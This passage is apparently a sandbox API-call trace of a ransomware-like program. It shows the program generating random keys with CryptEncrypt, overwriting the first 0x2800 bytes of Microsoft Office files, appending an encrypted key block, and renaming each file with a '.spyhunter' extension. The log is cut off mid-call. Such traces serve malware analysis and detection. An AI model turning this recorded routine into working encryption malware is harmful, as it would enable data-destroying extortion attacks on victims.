Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.ie.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\YAHOO.IE.XML.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\yahoo.ie.xml.spyhunter")) returned 1 [0111.370] GetProcessHeap () returned 0x2c0000 [0111.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc7358 | out: hHeap=0x2c0000) returned 1 [0111.370] GetProcessHeap () returned 0x2c0000 [0111.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0111.370] GetProcessHeap () returned 0x2c0000 [0111.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce9428 | out: hHeap=0x2c0000) returned 1 [0111.370] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa78 | out: pbBuffer=0x57fa78) returned 1 [0111.371] GetProcessHeap () returned 0x2c0000 [0111.371] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0111.371] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa70*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa70*=0x30) returned 1 [0111.371] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROJMODL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\projmodl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0111.372] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROJMODL.DLL") returned 59 [0111.372] StrStrW (lpFirst="PROJMODL.DLL", lpSrch=".txt") returned 0x0 [0111.372] GetProcessHeap () returned 0x2c0000 [0111.372] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0111.372] ReadFile (in: hFile=0x15c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fa34*=0x2800, lpOverlapped=0x0) returned 1 [0111.391] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.391] WriteFile (in: hFile=0x15c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fa34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fa34*=0x2800, lpOverlapped=0x0) returned 1 [0111.391] GetProcessHeap () returned 0x2c0000 [0111.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0111.392] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.392] WriteFile (in: hFile=0x15c, lpBuffer=0x57fa74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa34, lpOverlapped=0x0 | out: lpBuffer=0x57fa74*, lpNumberOfBytesWritten=0x57fa34*=0x4, lpOverlapped=0x0) returned 1 [0111.393] WriteFile (in: hFile=0x15c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa34, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa34*=0x30, lpOverlapped=0x0) returned 1 [0111.393] CloseHandle (hObject=0x15c) returned 1 [0111.393] GetProcessHeap () returned 0x2c0000 [0111.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0111.393] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROJMODL.DLL.spyhunter") returned 69 [0111.393] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROJMODL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\projmodl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROJMODL.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\projmodl.dll.spyhunter")) returned 1 [0111.394] GetProcessHeap () returned 0x2c0000 [0111.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0111.394] GetProcessHeap () returned 0x2c0000 [0111.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0111.394] GetProcessHeap () returned 0x2c0000 [0111.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa9c0 | out: hHeap=0x2c0000) returned 1 [0111.394] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa70 | out: pbBuffer=0x57fa70) returned 1 [0111.394] GetProcessHeap () returned 0x2c0000 [0111.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0111.394] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa68*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa68*=0x30) returned 1 [0111.394] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PTXT9.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\ptxt9.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0111.395] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PTXT9.DLL") returned 56 [0111.395] StrStrW (lpFirst="PTXT9.DLL", lpSrch=".txt") returned 0x0 [0111.396] GetProcessHeap () returned 0x2c0000 [0111.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0111.396] ReadFile (in: hFile=0x15c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57fa2c*=0x2800, lpOverlapped=0x0) returned 1 [0111.433] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.433] WriteFile (in: hFile=0x15c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fa2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57fa2c*=0x2800, lpOverlapped=0x0) returned 1 [0111.433] GetProcessHeap () returned 0x2c0000 [0111.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0111.433] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.433] WriteFile (in: hFile=0x15c, lpBuffer=0x57fa6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa2c, lpOverlapped=0x0 | out: lpBuffer=0x57fa6c*, lpNumberOfBytesWritten=0x57fa2c*=0x4, lpOverlapped=0x0) returned 1 [0111.465] WriteFile (in: hFile=0x15c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa2c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa2c*=0x30, lpOverlapped=0x0) returned 1 [0111.465] CloseHandle (hObject=0x15c) returned 1 [0111.466] GetProcessHeap () returned 0x2c0000 [0111.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0111.466] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PTXT9.DLL.spyhunter") returned 66 [0111.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PTXT9.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\ptxt9.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PTXT9.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\ptxt9.dll.spyhunter")) returned 1 [0111.467] GetProcessHeap () returned 0x2c0000 [0111.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0111.469] GetProcessHeap () returned 0x2c0000 [0111.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0111.469] GetProcessHeap () returned 0x2c0000 [0111.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfad80 | out: hHeap=0x2c0000) returned 1 [0111.470] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa70 | out: pbBuffer=0x57fa70) returned 1 [0111.470] GetProcessHeap () returned 0x2c0000 [0111.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0111.470] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa68*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa68*=0x30) returned 1 [0111.470] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROPMGR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\propmgr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0111.470] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROPMGR.DLL") returned 58 [0111.471] StrStrW (lpFirst="PROPMGR.DLL", lpSrch=".txt") returned 0x0 [0111.471] GetProcessHeap () returned 0x2c0000 [0111.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0111.471] ReadFile (in: hFile=0x15c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fa2c*=0x2800, lpOverlapped=0x0) returned 1 [0111.476] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.476] WriteFile (in: hFile=0x15c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fa2c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fa2c*=0x2800, lpOverlapped=0x0) returned 1 [0111.477] GetProcessHeap () returned 0x2c0000 [0111.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0111.477] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.477] WriteFile (in: hFile=0x15c, lpBuffer=0x57fa6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa2c, lpOverlapped=0x0 | out: lpBuffer=0x57fa6c*, lpNumberOfBytesWritten=0x57fa2c*=0x4, lpOverlapped=0x0) returned 1 [0111.659] WriteFile (in: hFile=0x15c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa2c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa2c*=0x30, lpOverlapped=0x0) returned 1 [0111.660] CloseHandle (hObject=0x15c) returned 1 [0111.660] GetProcessHeap () returned 0x2c0000 [0111.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0111.660] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROPMGR.DLL.spyhunter") returned 68 [0111.660] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROPMGR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\propmgr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROPMGR.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\propmgr.dll.spyhunter")) returned 1 [0111.662] GetProcessHeap () returned 0x2c0000 [0111.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0111.662] GetProcessHeap () returned 0x2c0000 [0111.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0111.662] GetProcessHeap () returned 0x2c0000 [0111.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfaa80 | out: hHeap=0x2c0000) returned 1 [0111.662] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa68 | out: pbBuffer=0x57fa68) returned 1 [0111.662] GetProcessHeap () returned 0x2c0000 [0111.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0111.662] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa60*=0x30) returned 1 [0111.662] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FORMCTL.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\formctl.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0111.692] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FORMCTL.POC") returned 65 [0111.692] StrStrW (lpFirst="FORMCTL.POC", lpSrch=".txt") returned 0x0 [0111.693] GetProcessHeap () returned 0x2c0000 [0111.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0111.693] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57fa24*=0x820, lpOverlapped=0x0) returned 1 [0111.716] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff7e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.716] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x57fa24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57fa24*=0x820, lpOverlapped=0x0) returned 1 [0112.215] GetProcessHeap () returned 0x2c0000 [0112.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0112.215] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.215] WriteFile (in: hFile=0x154, lpBuffer=0x57fa64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa24, lpOverlapped=0x0 | out: lpBuffer=0x57fa64*, lpNumberOfBytesWritten=0x57fa24*=0x4, lpOverlapped=0x0) returned 1 [0112.215] WriteFile (in: hFile=0x154, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa24, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa24*=0x30, lpOverlapped=0x0) returned 1 [0112.215] CloseHandle (hObject=0x154) returned 1 [0112.216] GetProcessHeap () returned 0x2c0000 [0112.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.216] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FORMCTL.POC.spyhunter") returned 75 [0112.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FORMCTL.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\formctl.poc"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FORMCTL.POC.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\formctl.poc.spyhunter")) returned 1 [0112.247] GetProcessHeap () returned 0x2c0000 [0112.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.247] GetProcessHeap () returned 0x2c0000 [0112.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0112.248] GetProcessHeap () returned 0x2c0000 [0112.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfd400 | out: hHeap=0x2c0000) returned 1 [0112.248] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa68 | out: pbBuffer=0x57fa68) returned 1 [0112.248] GetProcessHeap () returned 0x2c0000 [0112.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0112.248] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa60*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa60*=0x30) returned 1 [0112.248] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SSGEN.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\ssgen.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0112.248] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SSGEN.DLL") returned 56 [0112.248] StrStrW (lpFirst="SSGEN.DLL", lpSrch=".txt") returned 0x0 [0112.248] GetProcessHeap () returned 0x2c0000 [0112.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0112.249] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57fa24*=0x2800, lpOverlapped=0x0) returned 1 [0112.337] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.337] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57fa24, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57fa24*=0x2800, lpOverlapped=0x0) returned 1 [0112.337] GetProcessHeap () returned 0x2c0000 [0112.337] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0112.337] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.337] WriteFile (in: hFile=0x154, lpBuffer=0x57fa64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa24, lpOverlapped=0x0 | out: lpBuffer=0x57fa64*, lpNumberOfBytesWritten=0x57fa24*=0x4, lpOverlapped=0x0) returned 1 [0112.344] WriteFile (in: hFile=0x154, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa24, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa24*=0x30, lpOverlapped=0x0) returned 1 [0112.344] CloseHandle (hObject=0x154) returned 1 [0112.378] GetProcessHeap () returned 0x2c0000 [0112.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.378] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SSGEN.DLL.spyhunter") returned 66 [0112.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SSGEN.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\ssgen.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\SSGEN.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\ssgen.dll.spyhunter")) returned 1 [0112.379] GetProcessHeap () returned 0x2c0000 [0112.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.379] GetProcessHeap () returned 0x2c0000 [0112.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0112.379] GetProcessHeap () returned 0x2c0000 [0112.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfbbc0 | out: hHeap=0x2c0000) returned 1 [0112.379] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa60 | out: pbBuffer=0x57fa60) returned 1 [0112.379] GetProcessHeap () returned 0x2c0000 [0112.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0112.379] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa58*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa58*=0x30) returned 1 [0112.379] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\OFFISUPP.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\offisupp.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0112.382] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\OFFISUPP.HTM") returned 66 [0112.382] StrStrW (lpFirst="OFFISUPP.HTM", lpSrch=".txt") returned 0x0 [0112.382] GetProcessHeap () returned 0x2c0000 [0112.382] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0112.382] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fa1c*=0x1d5, lpOverlapped=0x0) returned 1 [0112.383] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffe2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.383] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1d5, lpNumberOfBytesWritten=0x57fa1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fa1c*=0x1d5, lpOverlapped=0x0) returned 1 [0112.383] GetProcessHeap () returned 0x2c0000 [0112.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0112.383] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.383] WriteFile (in: hFile=0x154, lpBuffer=0x57fa5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fa1c, lpOverlapped=0x0 | out: lpBuffer=0x57fa5c*, lpNumberOfBytesWritten=0x57fa1c*=0x4, lpOverlapped=0x0) returned 1 [0112.383] WriteFile (in: hFile=0x154, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fa1c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57fa1c*=0x30, lpOverlapped=0x0) returned 1 [0112.383] CloseHandle (hObject=0x154) returned 1 [0112.383] GetProcessHeap () returned 0x2c0000 [0112.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.384] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\OFFISUPP.HTM.spyhunter") returned 76 [0112.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\OFFISUPP.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\offisupp.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\OFFISUPP.HTM.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\offisupp.htm.spyhunter")) returned 1 [0112.384] GetProcessHeap () returned 0x2c0000 [0112.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.384] GetProcessHeap () returned 0x2c0000 [0112.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0112.384] GetProcessHeap () returned 0x2c0000 [0112.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d01df0 | out: hHeap=0x2c0000) returned 1 [0112.384] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fa60 | out: pbBuffer=0x57fa60) returned 1 [0112.385] GetProcessHeap () returned 0x2c0000 [0112.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0112.385] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57fa58*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57fa58*=0x30) returned 1 [0112.385] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\OFFISUPP.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\offisupp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0112.385] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\OFFISUPP.GIF") returned 66 [0112.385] StrStrW (lpFirst="OFFISUPP.GIF", lpSrch=".txt") returned 0x0 [0112.385] GetProcessHeap () returned 0x2c0000 [0112.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0112.385] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fa1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fa1c*=0x1202, lpOverlapped=0x0) returned 1 [0112.387] SetFilePointerEx (in: 